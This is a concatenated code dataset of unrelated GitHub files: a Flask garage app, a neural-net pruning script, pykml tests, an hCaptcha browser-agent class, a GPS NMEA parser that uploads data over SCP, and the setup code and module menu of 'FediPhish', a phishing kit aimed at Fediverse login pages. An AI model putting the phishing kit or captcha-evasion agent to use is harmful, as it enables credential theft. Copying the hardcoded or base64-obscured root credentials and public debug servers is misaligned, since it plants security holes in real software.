from utils.sim_zu import start as sim_zu
import sys
#import RPi.GPIO as GPIO
from flask import Flask, render_template, request
import time
import os
from datetime import datetime
import re
import pywhatkit
import keyboard as k
import ultraschallsensor
app = Flask(__name__)
# Set up the GPIO inputs/outputs
#GPIO.setmode(GPIO.BCM)
#GPIO.setwarnings(False)
#GPIO.setup(21, GPIO.OUT)
#GPIO.setup(20, GPIO.IN)
#lf = "/home/pi/garage/logs.txt"
lf_path = r"./logs.txt"
#lf = open(lf_path, encoding="UTF-8", mode="w")
status_path =r"./status.txt"
@app.route("/")
def main():
# GPIO pin reading is currently disabled; pass placeholder template data to the page:
templateData = {'test'}
# Pass the template data into the template main.html and return it to the user
return render_template('main.html', distanz=ultraschallsensor.distanz())
# This function is executed when the Open button is clicked:
@app.route("/activate")
def action():
#GPIO.output(21, GPIO.HIGH)
#time.sleep(1)
#GPIO.output(21, GPIO.LOW)
print(1)
with open(status_path, "r") as sfile:
status = sfile.read()
sfile.close()
print(2)
print(f"status={status}")
if int(status) == 0:
with open(status_path, "w") as f:
f.write("1")
print("write1")
sim_auf()
elif int(status) == 1:
with open(status_path, "w") as sfile:
sfile.write("0")
print("write0")
sim_zu()
now = datetime.now()
time = now.strftime("%d Jan %H:%M:%S")
#pywhatkit.sendwhatmsg_instantly("+49 178 8899478", f'Garage geöffnet durch Weboberfläche {time}',25, True, 5)
#pywhatkit.sendwhatmsg_to_group_instantly("L2wDsVunQhe4Zl5DkOTv90", f'Garage geöffnet durch Weboberfläche {time}', 15, True, 5)
with open(lf_path, "a") as file:
file.writelines(f"{time} -> WebApp\n")
file.close()
# Write an entry to the logfile
#log_file = open(lf, "a")
#read logfile
# @ Luca debugging necessary here
#ts = datetime.strptime(re.findall(".+?(?= ->)", last_line)[0], '%d/%m/%y %H:%M:%S')
#if the license plate is in the whitelist then open
# ts = datetime.now().strftime('%d/%m/%y %H:%M:%S')
# print("Garage-door opened for Web-App")
# log_file.write("{ts}; Website\n")
return render_template('main.html', distanz=ultraschallsensor.distanz())
@app.route('/logs')
def info():
with open(lf_path) as file:
logdata = file.readlines()
return render_template('logs.html',logdata=logdata, distanz=ultraschallsensor.distanz())
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=True)
```
#### File: garage/utils/sim_zu.py
```python
import paramiko
def start():
host = "192.168.0.113"
port = 22
username = "pi"
password = "<PASSWORD>"
command = 'export DISPLAY=:0 ; vlc "/home/pi/garage/garage_zu.mp4" --quiet --fullscreen'
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, port, username, password)
print("start1")
stdin, stdout, stderr = ssh.exec_command(command)
print("start2")
stdout.channel.set_combine_stderr(True)
print("start3")
#output = stdout.readlines()
print("start4")
if __name__ == "__main__":
start()
``` |
{
"source": "1337Eddy/BirdRecognitionPruning",
"score": 2
} |
#### File: imagenet/l1-norm-pruning/prune.py
```python
import argparse
import numpy as np
import os
import time
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
from torchvision import datasets, transforms
from torchsummary import summary
from resnet import resnet34
# Prune settings
parser = argparse.ArgumentParser(description='Pruning filters for efficient ConvNets')
parser.add_argument('--data', type=str, default='/media/eddy/backup/datasets/imagenet/ILSVRC/Data/CLS-LOC',
help='Path to imagenet validation data')
parser.add_argument('--test-batch-size', type=int, default=64, metavar='N',
help='input batch size for testing (default: 64)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--print-freq', '-p', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--save', default='.', type=str, metavar='PATH',
help='path to save prune model (default: none)')
parser.add_argument('-j', '--workers', default=16, type=int, metavar='N',
help='number of data loading workers (default: 16)')
parser.add_argument('-v', default='A', type=str,
help='version of the pruned model')
parser.add_argument('-t', '--test-epochs', default=100, type=int, metavar='T',
help='numbers of test epochs for evaluation')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if not os.path.exists(args.save):
os.makedirs(args.save)
model = resnet34(pretrained=True)
model = torch.nn.DataParallel(model).cuda()
cudnn.benchmark = True
print('Pre-processing Successful!')
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
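# Illustrative (hypothetical) example: with two samples whose targets are [3, 1] and whose
# top-5 predicted classes are [3, 7, 1, 0, 2] and [4, 2, 1, 9, 5], accuracy(output, target,
# topk=(1, 5)) returns prec@1 = 50.0 and prec@5 = 100.0.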
# simple test model after Pre-processing prune (simple set BN scales to zeros)
def test(model):
kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(os.path.join(args.data,'val'), transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
])),
batch_size=args.test_batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
model.eval()
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
criterion = nn.CrossEntropyLoss().cuda()
end = time.time()
for i, (input, target) in enumerate(val_loader):
target = target.cuda(non_blocking=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
i, args.test_epochs, batch_time=batch_time, loss=losses,
top1=top1, top5=top5))
if i == args.test_epochs:
break
print(' * Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg, top5.avg
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
skip = {
'A': [2, 8, 14, 16, 26, 28, 30, 32],
'B': [2, 8, 14, 16, 26, 28, 30, 32],
}
#pruning ratios for layer stages
prune_prob = {
'A': [0.5, 0.7, 0.6, 0.5],
'B': [0.5, 0.6, 0.4, 0.0],
}
layer_id = 1
cfg = []
cfg_mask = []
"""
iterate over layers and create new network structure based on L1 norm pruning
layers with 1x1 conv kernels are ignored
"""
for m in model.modules():
if isinstance(m, nn.Conv2d):
if m.kernel_size == (1,1):
continue
out_channels = m.weight.data.shape[0]
if layer_id in skip[args.v]:
cfg_mask.append(torch.ones(out_channels))
cfg.append(out_channels)
layer_id += 1
continue
if layer_id % 2 == 0:
#define layer stage for pruning ratio
if layer_id <= 6:
stage = 0
elif layer_id <= 14:
stage = 1
elif layer_id <= 26:
stage = 2
else:
stage = 3
prune_prob_stage = prune_prob[args.v][stage]
weight_copy = m.weight.data.abs().clone().cpu().numpy()
#sum weights of 3d filter
L1_norm = np.sum(weight_copy, axis=(1,2,3))
num_keep = int(out_channels * (1 - prune_prob[args.v][stage]))
arg_max = np.argsort(L1_norm)
arg_max_rev = arg_max[::-1][:num_keep]
mask = torch.zeros(out_channels)
mask[arg_max_rev.tolist()] = 1
cfg_mask.append(mask)
cfg.append(num_keep)
layer_id += 1
continue
layer_id += 1
assert len(cfg) == 16, "Length of cfg variable is not correct."
newmodel = resnet34(cfg=cfg)
newmodel = torch.nn.DataParallel(newmodel).cuda()
start_mask = torch.ones(3)
layer_id_in_cfg = 0
conv_count = 1
"""
the remaining parameters of the original model
are transferred to the pruned new model
"""
for [m0, m1] in zip(model.modules(), newmodel.modules()):
if isinstance(m0, nn.Conv2d):
if m0.kernel_size == (1,1):
# Cases for down-sampling convolution.
m1.weight.data = m0.weight.data.clone()
continue
if conv_count == 1:
m1.weight.data = m0.weight.data.clone()
conv_count += 1
continue
if conv_count % 2 == 0:
mask = cfg_mask[layer_id_in_cfg]
idx = np.squeeze(np.argwhere(np.asarray(mask.cpu().numpy())))
if idx.size == 1:
idx = np.resize(idx, (1,))
w = m0.weight.data[idx.tolist(), :, :, :].clone()
#print(w)
m1.weight.data = w.clone()
layer_id_in_cfg += 1
conv_count += 1
continue
if conv_count % 2 == 1:
mask = cfg_mask[layer_id_in_cfg-1]
idx = np.squeeze(np.argwhere(np.asarray(mask.cpu().numpy())))
if idx.size == 1:
idx = np.resize(idx, (1,))
w = m0.weight.data[:, idx.tolist(), :, :].clone()
m1.weight.data = w.clone()
conv_count += 1
continue
elif isinstance(m0, nn.BatchNorm2d):
assert isinstance(m1, nn.BatchNorm2d), "There should not be bn layer here."
if conv_count % 2 == 1:
mask = cfg_mask[layer_id_in_cfg-1]
idx = np.squeeze(np.argwhere(np.asarray(mask.cpu().numpy())))
if idx.size == 1:
idx = np.resize(idx, (1,))
m1.weight.data = m0.weight.data[idx.tolist()].clone()
m1.bias.data = m0.bias.data[idx.tolist()].clone()
m1.running_mean = m0.running_mean[idx.tolist()].clone()
m1.running_var = m0.running_var[idx.tolist()].clone()
continue
m1.weight.data = m0.weight.data.clone()
m1.bias.data = m0.bias.data.clone()
m1.running_mean = m0.running_mean.clone()
m1.running_var = m0.running_var.clone()
elif isinstance(m0, nn.Linear):
m1.weight.data = m0.weight.data.clone()
m1.bias.data = m0.bias.data.clone()
torch.save({'cfg': cfg, 'state_dict': newmodel.state_dict()}, os.path.join(args.save, 'pruned.pth.tar'))
summary(newmodel, (3, 224, 224))
#acc_top1, acc_top5 = test(model)
new_acc_top1, new_acc_top5 = test(newmodel)
num_parameters1 = sum([param.nelement() for param in model.parameters()])
num_parameters2 = sum([param.nelement() for param in newmodel.parameters()])
with open(os.path.join(args.save, "prune.txt"), "w") as fp:
fp.write("Before pruning: "+"\n")
fp.write("acc@1: tensor(73.3140, device='cuda:0')\n")
fp.write("acc@5: tensor(91.4200, device='cuda:0')\n")
fp.write("Number of parameters:\n")
fp.write("21797672\n")
fp.write("==========================================\n")
fp.write("After pruning: "+"\n")
fp.write("cfg :"+"\n")
fp.write(str(cfg)+"\n")
fp.write("acc@1: "+str(new_acc_top1)+"\n"+"acc@5: "+str(new_acc_top5)+"\n")
fp.write("Number of parameters: \n"+str(num_parameters2)+"\n")
``` |
{
"source": "1337-Haxx0r/Test",
"score": 4
} |
#### File: 1337-Haxx0r/Test/insecure_password_generator.py
```python
from random import randint
from sys import argv
from re import match
from sys import exit
if len(argv) != 1:
password_length = argv[1]
if not match("^([1-9]|[1-9][0-9])$", password_length):
print("Password length is invalid!")
exit()
else:
# Default Password Length
password_length = 16
alphanumeric = "A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9"
alphanumeric = alphanumeric.split(" ")
def get_random_char():
return alphanumeric[randint(0, len(alphanumeric) - 1)]
random_chars = []
password_length = int(password_length)
for i in range(password_length):
random_chars.append(get_random_char())
insecure_password = "".join(random_chars)
print(insecure_password)
if password_length < 16:
print("Your password is dangerously short.")
``` |
{
"source": "1337Lurker/2019-advent-of-code",
"score": 4
} |
#### File: 2019-advent-of-code/day1/day1.py
```python
import fileinput
import math
def main():
fuel_required = 0
for mass in fileinput.input():
fuel_required += calculate_fuel_for(mass)
print(fuel_required)
def calculate_fuel_for(mass):
fuel_required = math.floor(int(mass) / 3) - 2
if fuel_required > 0:
return fuel_required + calculate_fuel_for(fuel_required)
else:
return 0
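# Worked example: calculate_fuel_for(1969) = 654 + 216 + 70 + 21 + 5 = 966, since each
# batch of fuel also requires fuel until the extra amount drops to zero.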
if __name__ == "__main__":
# execute only if run as a script
main()
``` |
{
"source": "1337/pykml",
"score": 3
} |
#### File: pykml/test/test_parser.py
```python
from __future__ import print_function
import unittest
from os import path
import urllib2
from StringIO import StringIO
from lxml import etree
from pykml.parser import Schema
from pykml.parser import fromstring
from pykml.parser import parse
class ValidatorTestCase(unittest.TestCase):
def test_initialize_schema(self):
"""Tests the creation Schema instance"""
schema = Schema("ogckml22.xsd")
self.assertTrue(isinstance(schema.schema, etree.XMLSchema))
def test_initialize_schema_remote_url(self):
schema = Schema("http://code.google.com/apis/kml/schema/kml22gx.xsd")
self.assertTrue(isinstance(schema.schema, etree.XMLSchema))
class ParseKmlOgcTestCase(unittest.TestCase):
"A collection of tests related to parsing KML OGC documents"
def test_fromstring_kml_document(self):
"Tests the parsing of an valid KML string"
test_kml = '<kml xmlns="http://www.opengis.net/kml/2.2"/>'
tree = fromstring(test_kml, schema=Schema("ogckml22.xsd"))
self.assertEquals(etree.tostring(tree), test_kml)
tree = fromstring(test_kml)
self.assertEquals(etree.tostring(tree), test_kml)
def test_fromstring_invalid_kml_document(self):
"Tests the parsing of an invalid KML string"
test_kml = '<bad_element />'
try:
tree = fromstring(test_kml, schema=Schema("ogckml22.xsd"))
self.assertTrue(False)
except etree.XMLSyntaxError:
self.assertTrue(True)
except:
self.assertTrue(False)
def test_parse_kml_document(self):
"Tests the parsing of an valid KML file object"
test_kml = '<kml xmlns="http://www.opengis.net/kml/2.2"/>'
fileobject = StringIO(test_kml)
schema = Schema("ogckml22.xsd")
tree = parse(fileobject, schema=schema)
self.assertEquals(etree.tostring(tree), test_kml)
tree = parse(fileobject, schema=schema)
self.assertEquals(etree.tostring(tree), test_kml)
def test_parse_invalid_kml_document(self):
"Tests the parsing of an invalid KML document"
fileobject = StringIO('<bad_element />')
try:
tree = parse(fileobject, schema=Schema("ogckml22.xsd"))
self.assertTrue(False)
except etree.XMLSyntaxError:
self.assertTrue(True)
except:
self.assertTrue(False)
def test_parse_kml_url(self):
"Tests the parsing of a KML URL"
url = 'http://code.google.com/apis/kml/documentation/KML_Samples.kml'
#url = 'http://kml-samples.googlecode.com/svn/trunk/kml/Document/doc-with-id.kml'
#url = 'http://code.google.com/apis/kml/documentation/kmlfiles/altitudemode_reference.kml'
#url = 'http://code.google.com/apis/kml/documentation/kmlfiles/animatedupdate_example.kml'
try:
fileobject = urllib2.urlopen(url)
tree = parse(fileobject, schema=Schema("ogckml22.xsd"))
self.assertEquals(
etree.tostring(tree)[:78],
'<kml xmlns="http://www.opengis.net/kml/2.2">'
'<Document>'
'<name>KML Samples</name>'
)
except urllib2.URLError:
print('Unable to access the URL. Skipping test...')
def test_parse_kml_file_with_cdata(self):
"Tests the parsing of a local KML file, with a CDATA description string"
test_datafile = path.join(
path.dirname(__file__),
'testfiles',
'google_kml_tutorial/using_the_cdata_element.kml'
)
# parse with validation
with open(test_datafile) as f:
doc = parse(f, schema=Schema('ogckml22.xsd'))
self.assertEquals(
etree.tostring(doc),
'<kml xmlns="http://www.opengis.net/kml/2.2">'
'<Document>'
'<Placemark>'
'<name>CDATA example</name>'
'<description>'
'<![CDATA[\n'
' <h1>CDATA Tags are useful!</h1>\n'
' <p><font color="red">Text is <i>more readable</i> and \n'
' <b>easier to write</b> when you can avoid using entity \n'
' references.</font></p>\n'
' ]]>'
'</description>'
'<Point>'
'<coordinates>102.595626,14.996729</coordinates>'
'</Point>'
'</Placemark>'
'</Document>'
'</kml>'
)
# parse without validation
with open(test_datafile) as f:
doc2 = parse(f)
self.assertEquals(
etree.tostring(doc2),
'<kml xmlns="http://www.opengis.net/kml/2.2">'
'<Document>'
'<Placemark>'
'<name>CDATA example</name>'
'<description>'
'<![CDATA[\n'
' <h1>CDATA Tags are useful!</h1>\n'
' <p><font color="red">Text is <i>more readable</i> and \n'
' <b>easier to write</b> when you can avoid using entity \n'
' references.</font></p>\n'
' ]]>'
'</description>'
'<Point>'
'<coordinates>102.595626,14.996729</coordinates>'
'</Point>'
'</Placemark>'
'</Document>'
'</kml>'
)
def test_parse_invalid_ogc_kml_document(self):
"""Tests the parsing of an invalid KML document. Note that this KML
document uses elements that are not in the OGC KML spec.
"""
url = 'http://code.google.com/apis/kml/documentation/kmlfiles/altitudemode_reference.kml'
try:
fileobject = urllib2.urlopen(url)
tree = parse(fileobject, schema=Schema("ogckml22.xsd"))
self.assertTrue(False)
except urllib2.URLError:
print('Unable to access the URL. Skipping test...')
except etree.XMLSyntaxError:
self.assertTrue(True)
except:
self.assertTrue(False)
class ParseKmlGxTestCase(unittest.TestCase):
"A collection of tests related to parsing KML Google Extension documents"
def test_parse_kml_url(self):
"Tests the parsing of a KML URL"
url = 'http://code.google.com/apis/kml/documentation/kmlfiles/altitudemode_reference.kml'
try:
fileobject = urllib2.urlopen(url)
tree = parse(fileobject, schema=Schema('kml22gx.xsd'))
self.assertEquals(
etree.tostring(tree)[:185],
'<kml xmlns="http://www.opengis.net/kml/2.2" '
'xmlns:gx="http://www.google.com/kml/ext/2.2">'
'<!-- required when using gx-prefixed elements -->'
'<Placemark>'
'<name>gx:altitudeMode Example</name>'
)
except urllib2.URLError:
print('Unable to access the URL. Skipping test...')
def test_parse_kml_file(self):
"Tests the parsing of a local KML file, with validation"
test_datafile = path.join(
path.dirname(__file__),
'testfiles',
'google_kml_developers_guide/complete_tour_example.kml'
)
# parse without validation
with open(test_datafile) as f:
doc = parse(f)
# parse with validation (local schema file)
with open(test_datafile) as f:
doc = parse(f, schema=Schema('kml22gx.xsd'))
# parse with validation (remote schema file)
with open(test_datafile) as f:
doc = parse(f, schema=Schema('http://code.google.com/apis/kml/schema/kml22gx.xsd'))
self.assertTrue(True)
def test_parse_kml_url_2(self):
"Tests the parsing of a KML URL"
url = 'http://code.google.com/apis/kml/documentation/kmlfiles/animatedupdate_example.kml'
try:
fileobject = urllib2.urlopen(url)
tree = parse(fileobject, schema=Schema('kml22gx.xsd'))
self.assertEquals(
etree.tostring(tree)[:137],
'<kml xmlns="http://www.opengis.net/kml/2.2" '
'xmlns:gx="http://www.google.com/kml/ext/2.2">'
'<Document>'
'<name>gx:AnimatedUpdate example</name>'
)
except urllib2.URLError:
print('Unable to access the URL. Skipping test...')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "1337Syntax/py-hcaptcha",
"score": 3
} |
#### File: hcaptcha/agents/base.py
```python
from typing import Literal
from urllib.parse import urlencode
import json
import time
class Agent:
def __init__(self):
self._epoch_offset = 0
def get_screen_properties(self) -> dict:
"""Returns dict representing `window.screen`."""
return {}
def get_navigator_properties(self) -> dict:
"""Returns dict representing `window.navigator`."""
return {}
def epoch(self, ms: bool = True):
"""Returns current timestamp, with offset added."""
t = time.time() * 1000
t += self._epoch_offset
if not ms: t /= 1000
return int(t)
def epoch_travel(self, delta: float, ms: bool = True):
"""Offsets the epoch returned by `Agent.epoch`."""
if not ms: delta *= 1000
self._epoch_offset += delta
def epoch_wait(self):
"""Resets the epoch offset."""
if self._epoch_offset > 0:
time.sleep(self._epoch_offset/1000)
self._epoch_offset = 0
def json_encode(self, data: Literal) -> str:
"""Simulates a browser's way of JSON encoding."""
return json.dumps(data, separators=(",", ":"))
def url_encode(self, data: dict) -> str:
"""Simulates a browser's way of URL encoding."""
return urlencode(data)
def format_headers(
self,
url: str,
body: bytes = None,
headers: dict = {},
origin_url: str = None,
sec_site: str = "cross-site",
sec_mode: str = "cors",
sec_dest: str = "empty"
) -> dict:
"""Formats headers in a browser-like way."""
return headers
```
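A minimal sketch of subclassing the Agent above (property values are made up; a real agent would report a consistent browser fingerprint, and the import path is assumed from the file layout).
```python
from hcaptcha.agents.base import Agent  # import path assumed

class DummyAgent(Agent):
    def get_screen_properties(self) -> dict:
        return {"width": 1920, "height": 1080, "colorDepth": 24}

    def get_navigator_properties(self) -> dict:
        return {"userAgent": "Mozilla/5.0 (X11; Linux x86_64)", "language": "en-US"}

agent = DummyAgent()
agent.epoch_travel(1500)   # pretend 1.5s of simulated browser work has already elapsed
payload = agent.json_encode({"v": 1, "t": agent.epoch()})
agent.epoch_wait()         # sleep until real time catches up with the offset
```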
#### File: hcaptcha/proofs/__init__.py
```python
from . import hsl
from . import hsw
def get_proof(type, data):
if type == "hsl":
return hsl.get_proof(data)
elif type == "hsw":
return hsw.get_proof(data)
raise Exception(f"Unrecognized proof type '{type}'")
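
# Hedged usage note (added commentary, not from the original file): get_proof()
# only dispatches on the proof type reported by the hCaptcha challenge, e.g.
# get_proof("hsl", req_data) or get_proof("hsw", req_data); the payload format is
# whatever the corresponding hsl/hsw submodule expects.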
``` |
{
"source": "1337u53r/MotMot",
"score": 3
} |
#### File: 1337u53r/MotMot/NMEAparser.py
```python
from paramiko import SSHClient
from scp import SCPClient
import base64
import time
######################## Use this snippet for manual user input of the NMEA Sentence########################################
#nmea = input("Please enter a NMEA sentence: ") #Input the NMEA sentence here - Currently on works for 'GPRMC' sentences
#nmeaSplitSentence = nmea.split(",") #Splits the NMEA sentence into sections (type,time,status etc.)
#print (nmeaSplitSentence)
############################################################################################################################
def parser():
longlat = open("/home/pi/MotMot/longlat.txt", "w+") #creates the file in the current directory
longlat.close()
latlng = open("/home/pi/MotMot/latlng.txt", "w+") #creates the file in the current directory(ensures it exists so not to throw an error when removing duplicates)
latlng.close()
satView = "0"
    with open("/home/pi/MotMot/data.txt", "r") as data: #opens the file containing the captured data
for line in data:
nmea = line #Sets the variable equal to the string in data.txt
nmeaSplitSentence = nmea.split(",") #Splits the NMEA sentence into sections (type,time,status etc.)
if "GPRMC" in nmea:
type = "GPRMC" #Assign each section of the NMEA sentence a variable
time = nmeaSplitSentence[1:2]
latitude = nmeaSplitSentence[3:4] # Latitude: DDMM.MMMM (The first two characters are the degrees.)
latitudeDir = nmeaSplitSentence[4:5]
longitude = nmeaSplitSentence[5:6] #Longitude: DDDMM.MMMM (The first three characters are the degrees.)
longitudeDir = nmeaSplitSentence[6:7]
date = nmeaSplitSentence[9:10]
                type = str(type) #Makes object variables into string representations
time = str(time)
latitude = str(latitude)
latitudeDir = str(latitudeDir)
longitude = str(longitude)
longitudeDir = str(longitudeDir)
date = str(date)
                removeSplitter = ["'", "[", "]"] #Removes the brackets and hyphen from the original sentence split to allow for string manipulation
for splitter in removeSplitter:
time = time.replace(splitter, '')
latitude = latitude.replace(splitter, '')
latitudeDir = latitudeDir.replace(splitter, '')
longitude = longitude.replace(splitter, '')
longitudeDir = longitudeDir.replace(splitter, '')
date = date.replace(splitter, '')
afterParse = open("/home/pi/MotMot/longlat.txt", "a+") #use this to write to a file in the same location as this program
#if the length of the NMEA sentence is 38 after the splitting (meaning it's a GPRMC sentence) then write the needed data into a txt file
if len(type + " " + latitude[0:2] + "°" + latitude[2:8] + latitudeDir + " " + longitude[0:3] + "°" + longitude[3:9] + longitudeDir + " " + time[0:2] + ":" + time[2:4] + ":" + time[4:6] + "\n") == 38:
afterParse.write(type + " " + latitude[0:2] + "°" + latitude[2:8] + latitudeDir + " " + longitude[0:3] + "°" + longitude[3:9] + longitudeDir + " " + time[0:2] + ":" + time[2:4] + ":" + time[4:6] + " " + date[0:2] + "/" + date[2:4] + "/" + date[4:6] + "\n") #write the long and lat to the file ready to be plotted
#Open another txt file. This file gets transferred to the server, holding the required coordinates and extra details we use to show stuff on the website
DMS = open("/home/pi/MotMot/latlng.txt", "a+")
#Converting the latitude (DMS) to decimal for the website to understand
if(latitude[0:2] not in ".0123456789"): #Weird way to avoid processing bad input but it works
if("[" not in latitude[0:2]):
if("\\" not in latitude[0:2]) and ("x" not in latitude[0:2]) and (";" not in latitude[0:2]):
degree = int(latitude[0:2])
if(latitude[2:] not in ".0123456789"):
if("]" not in latitude[2:]):
if("\\" not in latitude[2:]) and ("x" not in latitude[2:]) and (";" not in latitude[2:]):
min = float(latitude[2:])
#sec = float(latitude[5:8])
#Writing out the decimal latitude value to latlng.txt
if (date[4:6] == "19"):
#This was the most accurate conversion method from DMS to decimal
MiNuTs = (min/60) #+ (sec/3600)
#DMS.write(latitude + " ")
DMS.write(str(degree) + "." + str(MiNuTs)[2:8] + " ")
#If first 2 characters of longitude is 00 then it's a negative number, so convert it that way.
if(longitude[0:2] == "00"):
#Convert longitude DMS to decimal (Taking 00's into consideration)
degree = "-" + longitude[2:3]
else:
degree = longitude[0:3]
if(longitude[3:5] not in ".0123456789"):
#Ignore string inputs that might cause problems when trying to convert to float & int
if ("]" not in longitude[3:5]) and ("A^" not in longitude[3:5]):
min = float(longitude[3:5])
sec = float("0." + longitude[6:9])
min+= sec
if (date[4:6] == "19"):
DMS.write(degree + "." + str(round((min/60),4))[2:] + " " + time[0:2] + ":" + time[2:4] + ":" + time[4:6] + " " + date[0:2] + "/" + date[2:4] + "/" + date[4:6] + " " + satView + " " + "\n")
DMS.close()
#Print out debug info in terminal
print ("Type: " + type) #Displays the NMEA sentence in Human Readable form
print ("Time: ", time[0:2] + ":" + time[2:4] + ":" + time[4:6])
print ("Latitude: ", latitude[0:2] + "°" + latitude[2:9] + latitudeDir)
print ("Longitude: ", longitude[0:3] + "°" + longitude[3:10] + longitudeDir)
print ("Date: ", date[0:2] + "/" + date[2:4] + "/" + date[4:6])
afterParse.close() #Close the file after writing
#GPGSV type sentence handling (for satellite numbers)
'''elif "GPGSV" in nmea:
type = "GPGSV" #Assign each section of the NMEA sentence a variable
satView = nmeaSplitSentence[3:4]
satNum = nmeaSplitSentence[4:5]
satView = str(satView)
satNum = str(satNum)
removeSplitter = ["'", "[", "]"]
for splitter in removeSplitter:
satView = satView.replace(splitter, '')
satNum = satNum.replace(splitter, '')
afterParse = open("/home/pi/MotMot/longlat.txt", "a+") #use this to write to a file in the same location as this program
afterParse.write(type + " " + satView + " " + satNum + " " + "\n") #write the long and lat to the file ready to be plotted
afterParse.close() #Close the file after writing'''
def removeDups():
#Remove duplicate entries (needs to have "latlng.txt" already created)
dupCheck = open("/home/pi/MotMot/latlng.txt", "r").readlines() #opens the file and reads each line ready to check for duplicates
    dupCheck_set = set(dupCheck) #Creates a set from the contents of the file ready to loop through ('set' is used, as it keeps only unique lines)
dupremoved = open("/home/pi/MotMot/latlng.txt", "w") #opens file ready to overwrite the file
for line in dupCheck_set: #loop through and write lines from the set to file
dupremoved.write(line)
def timeSorter():
#sorts the entries into time order
timeSort = open("/home/pi/MotMot/latlng.txt", "r").readlines() #opens the file and reads each line
timeSorted = sorted(timeSort, key=lambda i: (i.split(" ")[-4]), reverse=True) #sorts the lines into order using the timestamps, change to "reverse=False" to put in ascending order
reorderSortedTime = open("/home/pi/MotMot/latlng.txt", "w") ##opens file ready to overwrite the file
for line in timeSorted: #loop through and write lines from the list to file
reorderSortedTime.write(line)
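
# Note (added commentary): each well-formed latlng.txt line written by parser() has
# the form "<lat> <lon> HH:MM:SS dd/mm/yy <satView> \n", so split(" ")[-4] in
# timeSorter() selects the HH:MM:SS field as the sort key.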
def transfer():
#Send the coordinates to the server
ssh = SSHClient()
ssh.load_host_keys('/home/pi/MotMot/known_hosts') #looks to load the SSH key if it is saved locally
ssh.connect("192.168.3.11", username=base64.b64decode("cm9vdA=="), password=base64.b64decode("<PASSWORD>=="), look_for_keys=False) #Connects to the server via SSH
with SCPClient(ssh.get_transport()) as scp:
        scp.put('/home/pi/MotMot/latlng.txt', remote_path='/var/www/html') #file that will be transferred to the server and the location it will be saved to (this will overwrite the file on the server every time)
scp.close() #closes the connection
def main():
time.sleep(10)
while True:
parser()
removeDups()
timeSorter()
time.sleep(5)
transfer()
main()
``` |
{
"source": "1337vrt/FediPhish",
"score": 2
} |
#### File: FediPhish/core/main.py
```python
from subprocess import Popen as bg_cmd,DEVNULL,getoutput as bg_cmd_output
import time,os
from core.doge import *
def banner():
print('''
\033[40m\033[31m\033[01m* _____ _ _ ____ _ _ _ *
| ___|__ __| (_) _ \| |__ (_)___| |__
| |_ / _ \/ _` | | |_) | '_ \| / __| '_ \
| _| __/ (_| | | __/| | | | \__ \ | | |
|_| \___|\__,_|_|_| |_| |_|_|___/_| |_|
* *
Phish the Fediverse :)
v1.1 @1337vrt doge xD \033[0m''')
def intro():
banner()
print('''
\033[41m\033[01m\033[93mUsage of FediPhish for attacking targets
without prior mutual consent is illegal.\033[0m''')
def startup():
bg_cmd('rm -r server && mkdir server',shell=True,stderr=DEVNULL,stdout=DEVNULL)
bg_cmd('rm link',shell=True,stderr=DEVNULL,stdout=DEVNULL)
check_php = bg_cmd_output('which php')
if check_php == '':
col_exit("I require php but it's not installed.")
exit()
def stop_services():
bg_cmd('killall -9 ssh && killall -2 php',shell=True,stderr=DEVNULL,stdout=DEVNULL)
def move_files(web):
bg_cmd('cp -r ./core/web/'+web+'/* ./server',shell=True,stderr=DEVNULL,stdout=DEVNULL)
bg_cmd('cp ./core/web/login.php ./server',shell=True,stderr=DEVNULL,stdout=DEVNULL)
def web_list():
print('\n\033[01m\033[35mAvailable phishing modules\033[0m\033[01m')
print('+'+'-'*30+'+')
print('[1] Diaspora\t[4] Mastodon\n[2] GNU-Social\t[5] Pixelfed\n[3] Hubzilla\t[6] Socialhome')
print('+'+'-'*30+'+')
print('[99] Exit')
while 1:
ch=input('\n\033[35mFediPhish>\033[0m ')
if ch in ['1','2','3','4','5','6','99']:
break
else:
print('\033[31m\033[01mInvalid')
if ch=='1':
selected='Diaspora'
elif ch=='2':
selected='GNU-Social'
elif ch=='3':
